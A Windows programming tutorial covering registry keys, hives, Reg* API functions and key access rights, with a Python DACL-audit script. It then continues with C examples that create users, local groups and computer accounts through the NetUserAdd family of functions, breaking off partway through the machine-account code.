| HKEY_LOCAL_MACHINE | Registry entries subordinate to this key define the physical state of the computer, including data about the bus type, system memory, and installed hardware and software. It contains subkeys that hold current configuration data, including Plug and Play information (the Enum branch, which includes a complete list of all hardware that has ever been on the system), network logon preferences, network security information, software-related information (such as server names and the location of the server), and other system information. |
| HKEY_PERFORMANCE_DATA | Registry entries subordinate to this key allow you to access performance data. The data is not actually stored in the registry; the registry functions cause the system to collect the data from its source. Windows Me/98/95: This key is not supported. |
| HKEY_PERFORMANCE_NLSTEXT | Registry entries subordinate to this key reference the text strings that describe counters in the local language of the area in which the computer system is running. These entries are not available to Regedit.exe and Regedt32.exe. Windows 2000/NT, Windows Me/98/95: This key is not supported. |
| HKEY_PERFORMANCE_TEXT | Registry entries subordinate to this key reference the text strings that describe counters in US English. These entries are not available to Regedit.exe and Regedt32.exe. For Windows 2000/NT, Windows Me/98/95: This key is not supported. |
| HKEY_USERS | Registry entries subordinate to this key define the default user configuration for new users on the local computer and the user configuration for the current user. |

Table 1.

The RegOverridePredefKey() function enables you to map a predefined registry key to a specified key in the registry. For instance, a software installation program could remap a predefined key before installing a DLL component. This enables the installation program to easily examine the information that the DLL's installation procedure writes to the predefined key.

Figure 2: HKEY_CLASSES_ROOT registry key.

Figure 3: HKEY_CURRENT_USER registry key.

Figure 4: HKEY_LOCAL_MACHINE registry key.

Figure 5: HKEY_USERS registry key.

Figure 6: HKEY_CURRENT_CONFIG registry key.

Registry Hives

A hive is a group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data. The setup phase of the Windows boot process automatically retrieves data from these supporting files. You can also retrieve data manually using the Import Registry File menu item of the Registry Editor (Regedit.exe). When you shut down Windows, the operating system automatically writes the hive data to the supporting files. You can also back up the hive data manually using the Export Registry File menu item of the Registry Editor.

The supporting files for all hives except HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config directory; the supporting files for HKEY_CURRENT_USER are in the %SystemRoot%\Documents and Settings\Username directory and, for Windows NT, in the %SystemRoot%\Profiles\Username directory. The file name extensions of the files in these directories, and in some cases the lack of an extension, indicate the type of data they contain. The following table lists these extensions along with a description of the data in the file.

Figure 7: The C:\Documents and Settings\Johnny directory, user supporting files.

Figure 8: C:\WINDOWS\system32\config directory, supporting files for all hives.

| Extension | Description |
| --- | --- |
| No extension | A complete copy of the hive data. |
| .alt | A backup copy of the critical HKEY_LOCAL_MACHINE\System hive. Only the System key has an .alt file. |
| .log | A transaction log of changes to the keys and value entries in the hive. |
| .sav | Copies of the hive files as they looked at the end of the text-mode stage in Setup. Setup has two stages: text mode and graphics mode. The hive is copied to a .sav file after the text-mode stage of setup to protect it from errors that might occur if the graphics-mode stage of setup fails. If setup fails during the graphics-mode stage, only the graphics-mode stage is repeated when the computer is restarted; the .sav file is used to restore the hive data. |

Table 2.

The following table lists the standard hives and their supporting files.

| Registry hive | Supporting files |
| --- | --- |
| HKEY_CURRENT_CONFIG | System, System.alt, System.log, System.sav |
| HKEY_CURRENT_USER | Ntuser.dat, Ntuser.dat.log |
| HKEY_LOCAL_MACHINE\SAM | Sam, Sam.log, Sam.sav |
| HKEY_LOCAL_MACHINE\Security | Security, Security.log, Security.sav |
| HKEY_LOCAL_MACHINE\Software | Software, Software.log, Software.sav |
| HKEY_LOCAL_MACHINE\System | System, System.alt, System.log, System.sav |
| HKEY_USERS\.DEFAULT | Default, Default.log, Default.sav |

Table 3.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. The supporting file for the user profile hive for a particular user is located in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\SID\ProfileImagePath, and is named Ntuser.dat. The value of ProfileImagePath is a binary representation of the directory name of the user's profile, which includes the user's name. Use the Registry Editor to display this binary value as a string.

Figure 9: User (Johnny) profile hives under ProfileList key.

Figure 10: Ntuser.dat, the supporting file for the user (Johnny) profile hive.

Categories of Data

Before putting data into the registry, an application should divide the data into two categories:

Computer-specific data and

User-specific data.

By making this distinction, an application can support multiple users, and yet locate user-specific data over a network and use that data in different locations, allowing location-independent user profile data. A user profile is a set of configuration data saved for every user. When the application is installed, it should record the computer-specific data under the HKEY_LOCAL_MACHINE key. In particular, it should create keys for the company name, product name, and version number, as shown in the following example:

HKEY_LOCAL_MACHINE\Software\MyCompany\MyProduct\1.0

If the application supports COM, it should record that data under HKEY_LOCAL_MACHINE\Software\Classes. An application should record user-specific data under the HKEY_CURRENT_USER key, as shown in the following example:

HKEY_CURRENT_USER\Software\MyCompany\MyProduct\1.0

Opening, Creating, and Closing Keys

Before an application can add data to the registry, it must create or open a key. To create or open a key, an application always refers to the key as a subkey of a currently open key. The following predefined keys are always open:

HKEY_LOCAL_MACHINE.

HKEY_CLASSES_ROOT.

HKEY_USERS and

HKEY_CURRENT_USER.

An application uses the RegOpenKeyEx() function to open a key and the RegCreateKeyEx() function to create a key.

An application can use the RegCloseKey() function to close a key and write the data it contains into the registry. RegCloseKey() does not necessarily write the data to the registry before returning; it can take as much as several seconds for the cache to be flushed to the hard disk. If an application must explicitly write registry data to the hard disk, it can use the RegFlushKey() function. RegFlushKey(), however, uses many system resources and should be called only when absolutely necessary.

Writing and Deleting Registry Data

An application can use the RegSetValueEx() function to associate a value and its data with a key. To delete a value from a key, an application can use the RegDeleteValue() function. To delete a key, it can use the RegDeleteKey() function. A deleted key is not removed until the last handle to it has been closed. Subkeys and values cannot be created under a deleted key. It is not possible to lock a registry key during a write operation to synchronize access to the data. However, you can control access to a registry key using security attributes.

Retrieving Data from the Registry

To retrieve data from the registry, an application typically enumerates the subkeys of a key until it finds a particular one and then retrieves data from the value or values associated with it. An application can call the RegEnumKeyEx() function to enumerate the subkeys of a given key. To retrieve detailed data about a particular subkey, an application can call the RegQueryInfoKey() function. The RegGetKeySecurity() function retrieves a copy of the security descriptor protecting a key. An application can use the RegEnumValue() function to enumerate the values for a given key, and RegQueryValueEx() function to retrieve a particular value for a key. An application typically calls RegEnumValue() to determine the value names and then RegQueryValueEx() to retrieve the data for the names.

The RegQueryMultipleValues() function retrieves the type and data for a list of value names associated with an open registry key. This function is useful for dynamic key providers because it assures consistency of data by retrieving multiple values in an atomic operation. Because other applications can change the data in a registry value between the time your application can read a value and use it, you may need to ensure your application has the latest data. You can use the RegNotifyChangeKeyValue() function to notify the calling thread when there are changes to the attributes or contents of a registry key, or if the key is deleted. The function signals an event object to notify the caller. If the thread that calls RegNotifyChangeKeyValue() exits, the event is signaled and the monitoring of the registry key is stopped. You can control or specify what changes should be reported through the use of a notify filter or flag. Usually, changes are reported by signaling an event that you specify to the function. Note that the RegNotifyChangeKeyValue() function does not work with remote handles.

Registry Files

Applications can save part of the registry in a file and then load the contents of the file back into the registry. A registry file is useful when a large amount of data is being manipulated, when many entries are being made in the registry, or when the data is transitory and must be loaded and then unloaded again. Applications that back up and restore parts of the registry are likely to use registry files. To save a key and its subkeys and values to a registry file, an application can call the RegSaveKey() function. RegSaveKey() creates the file with the following information, depending upon which operating system it is running on.

| System | File attributes | Location if no path is specified | Error returned if file already exists |
| --- | --- | --- | --- |
| Windows Me/98/95 | Archive, hidden, read-only system | Created in the Windows directory for both local and remote keys. | Error code 1016, ERROR_REGISTRY_IO_FAILED |
| Windows Server 2003, Windows XP/2000/NT | Archive | Created in the current directory of the process for a local key, and in the %systemroot%\system32 directory for a remote key. | Error code 183, ERROR_ALREADY_EXISTS |

Table 4.

To write the registry file back to the registry, an application can use the RegLoadKey(), RegReplaceKey(), or RegRestoreKey() function. RegLoadKey() loads registry data from a specified file into a specified subkey under HKEY_USERS or HKEY_LOCAL_MACHINE on the calling application's computer or on a remote computer. The function creates the specified subkey if it does not already exist. After calling this function, an application can use the RegUnLoadKey() function to restore the registry to its previous state. RegReplaceKey() replaces a key and all its subkeys and values in the registry with the data contained in a specified file. The new data takes effect the next time the system is started.

RegRestoreKey() loads registry data from a specified file into a specified key on the calling application's computer or on a remote computer. This function replaces the subkeys and values below the specified key with the subkeys and values that follow the top-level key in the file. The RegConnectRegistry() function establishes a connection to a predefined registry handle on another computer. An application uses this function primarily to access information from a remote registry on other machines in a network environment, which you can also do by using the Registry Editor. You might want to access a remote registry to back up a registry or regulate network access to it. Note that you must have appropriate permissions to access a remote registry using this function.

Registry Key Security and Access Rights

The Windows security model enables you to control access to registry keys. You can specify a security descriptor for a registry key when you call the RegCreateKeyEx() or RegSetKeySecurity() function. If you specify NULL, the key gets a default security descriptor. The ACLs in a default security descriptor for a key are inherited from its direct parent key. To get the security descriptor of a registry key, call the GetNamedSecurityInfo() or GetSecurityInfo() function. The valid access rights for registry keys include the DELETE, READ_CONTROL, WRITE_DAC, and WRITE_OWNER standard access rights. Registry keys do not support the SYNCHRONIZE standard access right. The following table lists the specific access rights for registry key objects.

| Value | Meaning |
| --- | --- |
| KEY_ALL_ACCESS | Combines the STANDARD_RIGHTS_REQUIRED, KEY_QUERY_VALUE, KEY_SET_VALUE, KEY_CREATE_SUB_KEY, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, and KEY_CREATE_LINK access rights. |
| KEY_CREATE_LINK | Reserved for system use. |
| KEY_CREATE_SUB_KEY | Required to create a subkey of a registry key. |
| KEY_ENUMERATE_SUB_KEYS | Required to enumerate the subkeys of a registry key. |
| KEY_EXECUTE | Equivalent to KEY_READ. |
| KEY_NOTIFY | Required to request change notifications for a registry key or for subkeys of a registry key. |
| KEY_QUERY_VALUE | Required to query the values of a registry key. |
| KEY_READ | Combines the STANDARD_RIGHTS_READ, KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY values. |
| KEY_SET_VALUE | Required to create, delete, or set a registry value. |
| KEY_WOW64_64KEY | Enables a 64- or 32-bit application to open a 64-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values. |
| KEY_WOW64_32KEY | Enables a 64- or 32-bit application to open a 32-bit key on 64-bit Windows. This flag must be combined using the OR operator with the other flags in this table that either query or access registry values. |
| KEY_WRITE | Combines the STANDARD_RIGHTS_WRITE, KEY_SET_VALUE, and KEY_CREATE_SUB_KEY access rights. |

Table 5.

When you call the RegOpenKeyEx() function, the system checks the requested access rights against the key's security descriptor. If the user does not have the correct access to the registry key, the open operation fails. If an administrator needs access to the key, the solution is to enable the SE_TAKE_OWNERSHIP_NAME privilege and open the registry key with WRITE_OWNER access. You can request the ACCESS_SYSTEM_SECURITY access right to a registry key if you want to read or write the key's SACL.
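As an added example (not from the original text), the script below composes KEY_READ, KEY_WRITE and KEY_ALL_ACCESS from the rights listed in Table 5 and uses them to audit a key's allow entries for trustees that can modify the key or its protection. The bit values are the winnt.h definitions; the trustee names and the sample DACL are constructed, and deny entries and generic rights are not modelled.

```python
# Bit values from winnt.h for the access rights named in the text and Table 5.
RIGHTS = {
    "KEY_QUERY_VALUE": 0x0001,
    "KEY_SET_VALUE": 0x0002,
    "KEY_CREATE_SUB_KEY": 0x0004,
    "KEY_ENUMERATE_SUB_KEYS": 0x0008,
    "KEY_NOTIFY": 0x0010,
    "KEY_CREATE_LINK": 0x0020,
    "DELETE": 0x00010000,
    "READ_CONTROL": 0x00020000,
    "WRITE_DAC": 0x00040000,
    "WRITE_OWNER": 0x00080000,
    "ACCESS_SYSTEM_SECURITY": 0x01000000,
}
STANDARD_RIGHTS_READ = STANDARD_RIGHTS_WRITE = RIGHTS["READ_CONTROL"]
STANDARD_RIGHTS_REQUIRED = 0x000F0000   # DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER

# Composite rights, built exactly as Table 5 describes them.
KEY_READ = (STANDARD_RIGHTS_READ | RIGHTS["KEY_QUERY_VALUE"]
            | RIGHTS["KEY_ENUMERATE_SUB_KEYS"] | RIGHTS["KEY_NOTIFY"])
KEY_WRITE = STANDARD_RIGHTS_WRITE | RIGHTS["KEY_SET_VALUE"] | RIGHTS["KEY_CREATE_SUB_KEY"]
KEY_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | KEY_READ | KEY_WRITE | RIGHTS["KEY_CREATE_LINK"]

# Rights that let the holder change the key's contents or its security descriptor.
MODIFY_RIGHTS = ("KEY_SET_VALUE", "KEY_CREATE_SUB_KEY", "DELETE", "WRITE_DAC", "WRITE_OWNER")

# Constructed DACL: (trustee, access mask) pairs for access-allowed entries only.
SAMPLE_DACL = [
    ("BUILTIN\\Administrators", KEY_ALL_ACCESS),
    ("NT AUTHORITY\\SYSTEM", KEY_ALL_ACCESS),
    ("BUILTIN\\Users", KEY_READ),
    ("BUILTIN\\Power Users", KEY_READ | KEY_WRITE | RIGHTS["DELETE"]),
]
TRUSTED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM"}


def decode(mask):
    """Break an access mask into the individual right names it contains."""
    names = [name for name, bit in RIGHTS.items() if mask & bit]
    known = 0
    for bit in RIGHTS.values():
        known |= bit
    leftover = mask & ~known
    if leftover:                     # e.g. generic rights, which are not modelled here
        names.append(f"UNKNOWN(0x{leftover:08X})")
    return names


def audit(aces, trusted):
    """Return (trustee, rights) for every untrusted trustee that can modify the key."""
    findings = []
    for trustee, mask in aces:
        if trustee in trusted:
            continue
        held = [name for name in MODIFY_RIGHTS if mask & RIGHTS[name]]
        if held:
            findings.append((trustee, held))
    return findings


if __name__ == "__main__":
    for trustee, mask in SAMPLE_DACL:
        print(f"{trustee:<26} 0x{mask:08X} {', '.join(decode(mask))}")
    for trustee, held in audit(SAMPLE_DACL, TRUSTED):
        print(f"REVIEW: {trustee} holds {', '.join(held)}")
```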

Further reading and digging:

For Multibytes, Unicode characters and Localization please refer to Locale, wide characters & Unicode (Story) and Windows users & groups programming tutorials (Implementation).

The structure, enum, union and typedef story can be found in C/C++ struct, enum, union & typedef.

The notation used in MSDN is Hungarian Notation instead of CamelCase and is discussed in Windows programming notations.

Windows data type information is in Windows data types used in Win32 programming.

Microsoft Visual C++, online MSDN.

MSDN library.

C++ Tutorial

This is a continuation of the previous Windows User Accounts & Groups Programming 3.

The expected skills are:

Able to understand users and groups as implemented in Windows OSes.

Able to understand and use functions to manipulate users, groups and machine account.

Able to gather and understand the required information in order to use those functions.

Able to understand, appreciate and apply how Unicode/wide characters are implemented in Microsoft C programs.

Privilege and User Management

As a restricted user, to run your program in debug mode you must be a member of the Debugger Users group. The following example tries to show how a privilege is required to accomplish our task. First of all, using the previous program example, let us add the restricted users as members of the Debugger Users group so that they can run programs in debug mode. Make sure you remove mytestgroup from the Administrators group as a result of the previous program example.

A sample output:

F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#1

mypersonal\myuser#1 has been added successfully to Debugger Users on mypersonal machine.

F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#2

mypersonal\myuser#2 has been added successfully to Debugger Users on mypersonal machine.

F:\myproject\win32prog\Debug>myaddmember mypersonal "Debugger Users" mypersonal\myuser#3

mypersonal\myuser#3 has been added successfully to Debugger Users on mypersonal machine.

F:\myproject\win32prog\Debug>

Then log off and log on as the restricted user myuser#1 and start using Visual C++ .Net. First of all, let us try running our previous, first program example, creating users.

    //********* myuserprog.cpp **********
    // For WinXp
    #define _WIN32_WINNT 0x0501

    // Wide character/Unicode based program
    #ifndef UNICODE
    #define UNICODE
    #endif

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <lm.h>

    // Link with netapi32.lib, which provides NetUserAdd().

    // This program accepts 3 arguments: servername, username and password.
    // It is run on the local WinXp machine, so the servername is the local
    // WinXp machine name. Alternatively, pass NULL as the 1st parameter of
    // NetUserAdd() and drop the servername from the arguments.
    int wmain(int argc, wchar_t *argv[])
    {
        USER_INFO_1 ui;
        DWORD dwLevel = 1;
        DWORD dwError = 0;
        NET_API_STATUS nStatus;

        if(argc != 4)
        {
            fwprintf(stderr, L"Usage: %s ServerName UserName Password.\n", argv[0]);
            // or use fwprintf(stderr, L"Usage: %s UserName Password.\n", argv[0]);
            // for local machine and adjust other argc and argv[] array element appropriately.
            exit(1);
        }

        // Set up the USER_INFO_1 structure.
        // USER_PRIV_USER: name identifies a normal user
        // UF_SCRIPT: required for LAN Manager 2.0 and Windows NT and later.
        ui.usri1_name = argv[2];          // Username entered through command line
        ui.usri1_password = argv[3];      // Password (third argument)
        ui.usri1_priv = USER_PRIV_USER;   // As a normal/restricted user
        ui.usri1_home_dir = NULL;         // No home directory
        ui.usri1_comment = L"This is a test normal user account using NetUserAdd"; // Comment
        ui.usri1_flags = UF_SCRIPT;       // Must be UF_SCRIPT
        ui.usri1_script_path = NULL;      // No script path

        // Call the NetUserAdd() function, specifying level 1.
        nStatus = NetUserAdd(argv[1],
                             dwLevel,
                             (LPBYTE)&ui,
                             &dwError);

        // If the call succeeds, inform the user.
        if(nStatus == NERR_Success)
        {
            fwprintf(stderr, L"%s user has been successfully added on %s machine.\n", argv[2], argv[1]);
            fwprintf(stderr, L"Username: %s password: %s.\n", argv[2], argv[3]);
        }
        // Otherwise, print the system error.
        else
            fprintf(stderr, "A system error has occurred: %lu\n", nStatus);

        return 0;
    }

A sample output:

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#1 12345678

user#1 user has been successfully added on mypersonal machine.

Username: user#1 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#2 12345678

user#2 user has been successfully added on mypersonal machine.

Username: user#2 password: 12345678.

F:\myuserprog\myuserprog\Debug>myuserprog mypersonal user#3 12345678

user#3 user has been successfully added on mypersonal machine.

Username: user#3 password: 12345678.

F:\myuserprog\myuserprog\Debug>

Figure 5: user#1, user#2 and user#3 have been created.

Well, we can create a user account just by being a member of the Debugger Users group. Next, let's test the previous program that creates a local group.

//********* myuserproglg.cpp **********
// For WinXp
#define _WIN32_WINNT 0x0501

// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // exit()
#include <lm.h>

// This program accepts 3 arguments: servername, GroupName and Comment.
int wmain(int argc, wchar_t *argv[])
{
    LOCALGROUP_INFO_1 lgi1;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;

    if(argc != 4)
    {
        fwprintf(stderr, L"Usage: %s ServerName GroupName Comment\n", argv[0]);
        // Just exit, no further processing
        exit(1);
    }

    // Set up the LOCALGROUP_INFO_1 structure.
    // Assign the group name and comment
    lgi1.lgrpi1_name = argv[2];      // Local group name
    lgi1.lgrpi1_comment = argv[3];   // Comment

    // Call the NetLocalGroupAdd() function, specifying level 1.
    nStatus = NetLocalGroupAdd(argv[1],
                               dwLevel,
                               (LPBYTE)&lgi1,
                               &dwError);

    // If the call succeeds, inform the user.
    if(nStatus == NERR_Success)
        fwprintf(stderr, L"%s local group has been created successfully on %s machine.\n", argv[2], argv[1]);
    // Otherwise, print the system error.
    else
        fprintf(stderr, "A system error has occurred: %d\n", nStatus);

    return 0;
}

A sample output:

F:\myuserprog\myuserprog\Debug>myuserproglg

Usage: myuserproglg ServerName GroupName Comment

F:\myuserprog\myuserprog\Debug>myuserproglg mypersonal normalusergroup "Created by restricted user"

normalusergroup local group has been created successfully on mypersonal machine.

F:\myuserprog\myuserprog\Debug>

Verify our task.

Figure 6: normalusergroup group has been created.

Also successful. Next, test the program example that adds a user to a group. When the previous program example was run to add a user as a member of the built-in Users and Power Users groups, the output showed the following error code.

A sample output:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\myuser#1>f:

F:\myuserprog\myuserprog\Debug>mynewaddmember

Usage: mynewaddmember ServerName GroupName MemberAccountName-(DomainName\AccountName)

F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal Users mypersonal\user#1

A system error has occurred: 5

F:\myuserprog\myuserprog\Debug>mynewaddmember mypersonal "Power Users" mypersonal\user#1

A system error has occurred: 5

F:\myuserprog\myuserprog\Debug>

This error code means: 5 - Access is denied (ERROR_ACCESS_DENIED). As a restricted user we don't have the privilege, because the access token we are carrying doesn't have permission to complete the task.

Creating a Local Group and Adding a User

Windows Server 2003 family, Windows XP, Windows 2000, and Windows NT use the same functions that Microsoft LAN Manager uses to create and maintain user and local group-account information. For example, to create a new local group, call the NetLocalGroupAdd() function. To add a user to that group, call the NetLocalGroupAddMembers() function. The following program allows you to create a user and a local group and then add the user to the local group.

The following program example was run on a Windows 2000 member server of the jmtibm.com domain. Its Fully Qualified Domain Name (FQDN) is jmti_st_00.jmtibm.com and the Domain Controller's (DC) FQDN is mawar.jmtibm.com. The member server was logged on to as Domain Administrator. The compiler used is Visual C++ 6.0. The steps to add the netapi32.lib library (or another library) to the project in Visual C++ 6.0 are shown below.

Project menu → Setting... sub menu. Then click the Link tab on the right page. Under Object/Library modules: type manually the library name at the end of the list separated by a space. Click the OK button.

Figure 7: Adding library to Visual C++ project.

Figure 8: Another step of adding library to Visual C++ project.

Then let's run our program example, which creates a new user and a group and then adds the user as a member of that group.

//********* myusrgrp.cpp ************
// Network management functions have their own
// error codes...
#define _WIN32_WINNT 0x0500
#define UNICODE 1

#include <windows.h>
#include <lmcons.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <lmapibuf.h>
#include <stdio.h>
#include <stdlib.h>

NET_API_STATUS MyTestNet(LPWSTR lpszDomain,
                         LPWSTR lpszUser,
                         LPWSTR lpszPassword,
                         LPWSTR lpszLocalGroup)
{
    USER_INFO_1 user_info;
    LOCALGROUP_INFO_1 localgroup_info;
    LOCALGROUP_MEMBERS_INFO_3 localgroup_members;
    LPWSTR lpszPrimaryDC = NULL;   // Filled in by NetGetDCName()
    NET_API_STATUS err = 0;
    DWORD parm_err = 0;

    // First get the name of the primary domain controller. Make sure to free the returned buffer.
    err = NetGetDCName(L"mawar",                     // Server that runs the call (the DC here); NULL means the local machine
                       lpszDomain,                   // Domain name; NULL means the primary domain
                       (LPBYTE *)&lpszPrimaryDC);    // Returned PDC
    if(err != 0)
    {
        printf("Error getting DC name: %d\n", err);
        return(err);
    }

    // Set up the USER_INFO_1 structure.
    user_info.usri1_name = lpszUser;
    user_info.usri1_password = lpszPassword;
    user_info.usri1_priv = USER_PRIV_USER;
    user_info.usri1_home_dir = TEXT("");
    user_info.usri1_comment = TEXT("This is just a sample user lol!");
    user_info.usri1_flags = UF_SCRIPT;
    user_info.usri1_script_path = TEXT("");

    err = NetUserAdd(lpszPrimaryDC,        // PDC name
                     1,                    // Level, use other level for more information
                     (LPBYTE)&user_info,   // Input buffer
                     &parm_err);           // Parameter in error
    switch (err)
    {
        case 0:
            printf("%ls user successfully created.\n", user_info.usri1_name);
            break;
        case NERR_UserExists:
            printf("%ls user already exists.\n", user_info.usri1_name);
            err = 0;
            break;
        case ERROR_INVALID_PARAMETER:
        {
            printf("Invalid Parameter Error adding user: Parameter Index = %d\n", parm_err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
        }
        default:
            printf("Error adding %ls user: %d\n", user_info.usri1_name, err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
    }

    // Set up the LOCALGROUP_INFO_1 structure.
    localgroup_info.lgrpi1_name = lpszLocalGroup;
    localgroup_info.lgrpi1_comment = TEXT("This is just a sample Local group.");

    err = NetLocalGroupAdd(lpszPrimaryDC,              // PDC name
                           1,                          // Level
                           (LPBYTE)&localgroup_info,   // Input buffer
                           &parm_err);                 // Parameter in error
    switch (err)
    {
        case 0:
            printf("%ls Local Group successfully created.\n", localgroup_info.lgrpi1_name);
            break;
        case ERROR_ALIAS_EXISTS:
            printf("%ls Local Group already exists.\n", localgroup_info.lgrpi1_name);
            err = 0;
            break;
        case ERROR_INVALID_PARAMETER:
        {
            // Print the index of the offending parameter, not the error code.
            printf("Invalid Parameter Error adding Local Group: Parameter Index = %d\n", parm_err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
        }
        default:
            printf("Error adding %ls Local Group: %d\n", localgroup_info.lgrpi1_name, err);
            NetApiBufferFree(lpszPrimaryDC);
            return(err);
    }

    // Now add the user to the local group.
    localgroup_members.lgrmi3_domainandname = lpszUser;

    err = NetLocalGroupAddMembers(lpszPrimaryDC,                 // PDC name
                                  lpszLocalGroup,                // Group name
                                  3,                             // Name
                                  (LPBYTE)&localgroup_members,   // Buffer
                                  1);                            // Count
    switch(err)
    {
        case 0:
            printf("%ls user successfully added to %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
            break;
        case ERROR_MEMBER_IN_ALIAS:
            printf("User %ls already in %ls Local Group.\n", user_info.usri1_name, localgroup_info.lgrpi1_name);
            err = 0;
            break;
        default:
            printf("Error adding %ls user to %ls Local Group: %d\n", user_info.usri1_name, localgroup_info.lgrpi1_name, err);
            break;
    }

    NetApiBufferFree(lpszPrimaryDC);
    return (err);
}

// This program runs at the command prompt and receives 4 arguments: the domain name,
// user name (user account), user password and the group name.
int wmain(int argc, wchar_t *argv[])
{
    NET_API_STATUS err = 0;

    if(argc != 5)
    {
        printf("Usage: %ls <domain_name> <user_name> <password> <group_name>\n", argv[0]);
        exit (-1);
    }

    printf("Calling MyTestNet(): Create a user and a group then,\n");
    printf("add the user to the group.\n");
    printf("===================================================.\n");

    err = MyTestNet(argv[1],    // domain name
                    argv[2],    // user account
                    argv[3],    // password for the user
                    argv[4]);   // group name

    printf("MyTestNet() returned %d\n", err);
    return (0);
}

A sample output:

C:\myproject\win32prog\Debug>myusrgrp

Usage: myusrgrp <domain_name> <user_name> <password> <group_name>

C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup

Calling MyTestNet(): Create a user and a group then,

add the user to the group.

===================================================.

mytestuser user successfully created.

mytestgroup Local Group successfully created.

mytestuser user successfully added to mytestgroup Local Group.

MyTestNet() returned 0

Rerun the program with same arguments.

A sample output:

C:\myproject\win32prog\Debug>myusrgrp jmtibm mytestuser 12345678 mytestgroup

Calling MyTestNet(): Create a user and a group then,

add the user to the group.

===================================================.

mytestuser user already exists.

mytestgroup Local Group already exists.

User mytestuser already in mytestgroup Local Group.

MyTestNet() returned 0

It looks OK. Then verify our task.

Figure 9: mytestuser user and mytestgroup group have been created.

The mytestuser user is still not usable because there is no login name setting, etc. Use the NetUserSetInfo() function with a different level to set other properties of the user account, as demonstrated in the previous program example. For a domain user account, when you try to delete the account a message asks whether the mailbox of that user also needs to be deleted. This means an email account has also been created for that account.

Creating a New Computer Account

The following program example demonstrates how to create a new computer account using the NetUserAdd() function. The following are considerations for managing computer accounts:

The computer account name should be all uppercase for consistency with Windows NT or later account management utilities.

A computer account name always has a trailing dollar sign ($). Any functions used to manage computer accounts must build the computer name such that the last character of the computer account name is a dollar sign ($). For interdomain trust, the account name is TrustingDomainName$.

The maximum computer name length is MAX_COMPUTERNAME_LENGTH (15). This length does not include the trailing dollar sign ($).

The password for a new computer account should be the lowercase representation of the computer account name, without the trailing dollar sign ($). For interdomain trust, the password can be an arbitrary value that matches the value specified on the trust side of the relationship.

The maximum password length is LM20_PWLEN (14). The password should be truncated to this length if the computer account name exceeds this length.

The password provided at computer-account-creation time is valid only until the computer account becomes active on the domain. A new password is established during trust relationship activation.

The program example was run on a Windows 2000 member server of the jmtibm.com domain, the same as the previous example.

//********* machineacct.cpp *********
// For Win 2000
#define _WIN32_WINNT 0x0500

// Wide character/Unicode based program
#ifndef UNICODE
#define UNICODE
#endif

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // exit()
#include <wctype.h>   // towupper(), towlower()
#include <lm.h>

BOOL AddMachineAccount(LPWSTR wTargetComputer, LPWSTR MachineAccount, DWORD AccountType)
{
    LPWSTR wAccount;
    LPWSTR wPassword;
    USER_INFO_1 ui;
    DWORD cbAccount;
    DWORD cbLength;
    DWORD dwError;

    // Ensure a valid computer account type was passed.
    if(AccountType != UF_WORKSTATION_TRUST_ACCOUNT &&
       AccountType != UF_SERVER_TRUST_ACCOUNT &&
       AccountType != UF_INTERDOMAIN_TRUST_ACCOUNT)
    {
        SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }
    else
        printf("Computer account type is valid.\n");

    // Obtain the number of chars in computer account name.
    cbLength = cbAccount = lstrlenW(MachineAccount);

    // Ensure computer name doesn't exceed maximum length.
    if(cbLength > MAX_COMPUTERNAME_LENGTH)
    {
        SetLastError(ERROR_INVALID_ACCOUNT_NAME);
        return FALSE;
    }
    else
        printf("Computer name length is valid.\n");

    // Allocate storage to contain Unicode representation of
    // computer account name + trailing $ + NULL.
    wAccount = (LPWSTR)HeapAlloc(GetProcessHeap(), 0,
                                 (cbAccount + 1 + 1) * sizeof(WCHAR)   // Account + '$' + NULL
                                 );
    if(wAccount == NULL) return FALSE;
    else printf("Memory allocation is OK.\n");

    // Password is the computer account name converted to lowercase;
    // you will convert the passed MachineAccount in place.
    wPassword = MachineAccount;

    // Copy MachineAccount to the wAccount buffer allocated while
    // converting computer account name to uppercase.
    // Convert password (in place) to lowercase.
    while(cbAccount--) {
        wAccount[cbAccount] = towupper(MachineAccount[cbAccount]);
        wPassword[cbAccount] = towlower(wPassword[cbAccount]);
    }

    // Computer account names have a trailing Unicode '$'.
    wAccount[cbLength] = L'$';
    wAccount[cbLength + 1] = L'\0';   // terminate the string

    // If the password is greater than the max allowed, truncate.
    if(cbLength > LM20_PWLEN) wPassword[LM20_PWLEN] = L'\0';
    else printf("No truncation was done to the password, the length is OK, max is 14.\n");

    // Initialize the USER_INFO_1 structure.
    ZeroMemory(&ui, sizeof(ui));
    ui.usri1_name = wAccount;
    ui.usri1_password = wPassword;
    ui.usri1_flags = AccountType | UF_SCRIPT;
    ui.usri1_priv = USER_PRIV_USER;
